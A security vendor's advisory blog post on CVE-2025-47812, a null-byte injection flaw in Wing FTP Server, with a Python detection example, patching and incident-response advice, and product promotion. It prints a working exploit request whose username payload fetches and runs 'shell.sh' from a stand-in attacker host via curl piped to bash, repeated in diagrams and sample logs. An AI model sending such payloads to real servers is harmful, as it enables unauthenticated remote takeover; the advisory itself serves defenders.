CVE-2025-47812: Wing FTP Server Remote Code Execution Vulnerability (Null Byte Injection)

Published July 12, 2025 | CVSS Score: 10.0 (Critical)

CVE-2025-47812 is a critical vulnerability affecting Wing FTP Server versions prior to 7.4.4. This severe flaw enables unauthenticated attackers to execute arbitrary code remotely (RCE) by exploiting inadequate validation of input containing null bytes (%00) in the authentication process.

When attackers inject a null byte into the username parameter, Wing FTP Server’s string handling functions prematurely terminate string processing at that byte, bypassing authentication controls while preserving the malicious Lua code that follows it. That code is then executed with elevated privileges (root/SYSTEM), allowing full compromise (Arctic Wolf, 2025; Help Net Security, 2025).

The exploit was publicly disclosed on June 30, 2025, and active exploitation was first detected on July 1, 2025 (The Hacker News, 2025).

Written by the Kodem Security Research Team. Published July 12, 2025. Topic: Vulnerabilities.

Technical Attack Breakdown

A typical exploit request involves an HTTP POST containing the null-byte payload:

POST /loginok.html HTTP/1.1
Host: vulnerable-server.com

username=anon%00print(os.execute("curl -s http://attacker.com/shell.sh | bash"))

How the exploit works:

  1. The %00 null byte prematurely terminates the username string during authentication.
  2. The complete malicious input is stored verbatim into a session file.
  3. Wing FTP executes this session file as a Lua script, granting attackers root-level shell access.
┌───────────────────┐                  ┌──────────────────┐
│                   │  1. HTTP POST    │                  │
│     Attacker      │ ─────────────────▶   Wing FTP       │
│                   │  with %00 payload│   Server         │
└───────────────────┘                  └──────────────────┘
2. Authentication Check
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  username=anon%00print(os.execute("curl attacker.com/shell.sh | │
│  bash"))                                                        │
│                                                                 │
│  ◀─────────────┬───────────────────────────────▶                │
│     Processed  │        Ignored during auth check               │
│     as "anon"  │        but stored completely                   │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
3. Creates Session File
┌─────────────────────────────────────────────────────────────────┐
│  /Session/sess_[ID].lua                                         │
│                                                                 │
│  -- Session data                                                │
│  username="anon                                                 │
│  print(os.execute("curl attacker.com/shell.sh | bash"))"        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
4. Executes as Lua Script
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  Server executes script with SYSTEM/root privileges             │
│                                                                 │
│  ┌────────────────────────────────┐                             │
│  │ print(os.execute("curl         │ ──▶ Retrieves & executes    │
│  │ attacker.com/shell.sh | bash"))│      malicious shell script │
│  └────────────────────────────────┘                             │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
5. Attacker Gains Control
┌───────────────────┐                  ┌──────────────────┐
│                   │  6. Remote Shell │                  │
│     Attacker      │ ◀─────────────────  Compromised     │
│                   │  with root/SYSTEM│  Server          │
└───────────────────┘                  └──────────────────┘

The core vulnerability emerges from a fundamental disparity in how different parts of Wing FTP Server process the same input string:

User Input: anonymous%00malicious_lua_code
              |          |
              V          V
Authentication     Session Storage
    Sees:            Stores:
 "anonymous"    "anonymous\0malicious_lua_code"
              |          |
              V          V
             PASS       EXECUTE

Affected Systems

  • Wing FTP Server versions earlier than 7.4.4.
  • Approximately 5,000 internet-facing Wing FTP Server instances are currently exposed to this vulnerability (The Hacker News, 2025).

Recommended Actions for Application Security Teams

Priority 1:

  • Immediately upgrade Wing FTP servers to version 7.4.4 or newer.
  • If immediate patching is not feasible, temporarily restrict access to /loginok.html using firewall or WAF rules.

Priority 2:

  • Audit software inventories and Software Bill of Materials (SBOMs) to identify all deployments or embedded instances of Wing FTP.
  • Examine server logs urgently for %00 patterns and suspicious session file creation under /Session/.

Priority 3:

  • Disable anonymous FTP accounts immediately.
  • Rotate all FTP-related credentials.
  • Limit administrative interface access to internal networks or VPN only.
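The following is an added example, not code from Kodem or from Wing FTP Server. It models the input disparity described in the technical breakdown (a NUL-terminated string routine sees only "anon", while the full buffer is stored) and gives defenders the %00 log check recommended under Priority 2. The function names, the Lua indicator list, and the proxy-style log lines are all constructed for illustration; Wing FTP's own log format is not shown in this post.

```python
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/loginok.html"
# Lua calls that appear in the post's payload; an assumed indicator list, not exhaustive
LUA_MARKERS = re.compile(r"os\.execute|io\.popen|print\(")

def c_string_view(raw: bytes) -> bytes:
    """What a NUL-terminated string routine sees: the bytes before the first 0x00."""
    nul = raw.find(b"\x00")
    return raw if nul < 0 else raw[:nul]

def username_is_safe(raw: bytes) -> bool:
    """Hardened check: validate the whole buffer and reject NUL and other control bytes."""
    return 0 < len(raw) <= 64 and all(0x20 <= b < 0x7F for b in raw)

def inspect_login_body(body: str) -> dict:
    """Decode a captured POST body and compare the auth view with the stored view."""
    user = parse_qs(body, keep_blank_values=True).get("username", [""])[0]
    raw = user.encode("utf-8", "surrogateescape")
    auth_view = c_string_view(raw)
    tail = raw[len(auth_view):].decode("utf-8", "replace")  # what survives past the NUL
    return {
        "auth_sees": auth_view.decode("utf-8", "replace"),
        "stored": raw.decode("utf-8", "replace"),
        "truncated": auth_view != raw,
        "lua_after_nul": bool(LUA_MARKERS.search(tail)),
        "reject": not username_is_safe(raw),
    }

def scan_log(lines) -> list:
    """Return client IPs of login requests whose logged URL or body carries an encoded NUL."""
    return [ln.split()[0] for ln in lines if LOGIN_PATH in ln and "%00" in ln]

# Constructed log lines in a proxy/WAF style that records the request body.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2025:02:14:11 +0000] "POST /loginok.html HTTP/1.1" 200 '
    '"username=anon%00print(os.execute(%22curl attacker.com/shell.sh | bash%22))"',
    '198.51.100.4 - - [01/Jul/2025:02:15:00 +0000] "POST /loginok.html HTTP/1.1" 200 "username=alice"',
    '203.0.113.9 - - [01/Jul/2025:02:16:40 +0000] "GET /index.html HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    print(inspect_login_body('username=anon%00print(os.execute("id"))'))
    print(scan_log(SAMPLE_LOG))
```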

Incident Response Guidelines for SOC/IR Teams

  1. Containment:
    • Isolate affected hosts immediately.
    • Create forensic snapshots of memory and disk, preserving session files under /Session.
  2. Investigation:
    • Inspect logs for outbound requests (curl, wget, PowerShell) and unauthorized file or user account creation or modification.
  3. Eradication and Recovery:
    • Rebuild affected servers from trusted images with Wing FTP version 7.4.4 or later.
    • Rotate credentials stored on compromised systems.
  4. Post-Incident Recommendations:
    • Implement monitoring rules targeting Lua script execution and HTTP requests containing %00.
    • Conduct a post-mortem and update security training regarding vulnerabilities related to null byte injections.

How Kodem Protects Customers

  • Kodem SCA customers were instantly able to identify (a) where the vulnerable Wing FTP package was installed, (b) where it was actively running in production, and (c) which instances were reachable and exploitable by attackers. Kodem promptly detected exploit activity, mitigated the immediate threat until patches were deployed, and continued monitoring for future exploitation attempts.
  • Kodem’s runtime detection capability, leveraging eBPF and memory analysis, immediately identified attacker-triggered Lua executions within Wing FTP Server processes, without requiring an agent on the vulnerable server.
  • Kodem automatically constructed an attack-chain visualization correlating malicious HTTP requests, Lua executions, and resulting command shells. Initial exploitation attempts were detected by Kodem customers on July 1st, 2025, preceding widespread public advisories.

Key Lessons for Security Teams

  • Static analysis and SBOMs list installed components but do not reflect runtime vulnerabilities and attacks.
  • The time between vulnerability disclosure and active exploitation has shortened significantly, often to mere hours, emphasizing the importance of rapid incident response.
  • Runtime monitoring provides essential context, converting vulnerability data into actionable intelligence. Static vulnerability listings alone are insufficient.

In short: “Static findings suggest vulnerabilities. Runtime reveals exploitation.”

References

Arctic Wolf. (2025, July 10). CVE-2025-47812: Wing FTP Server remote code execution vulnerability exploited in the wild. Retrieved from https://arcticwolf.com/resources/blog-uk/cve-2025-47812-wing-ftp-server-remote-code-execution-vulnerability-exploited-in-the-wild/

Help Net Security. (2025, July 11). Critical Wing FTP Server vulnerability exploited in the wild (CVE-2025-47812). Retrieved from https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/

The Hacker News. (2025, July 11). Critical Wing FTP Server vulnerability actively being exploited. Retrieved from https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html
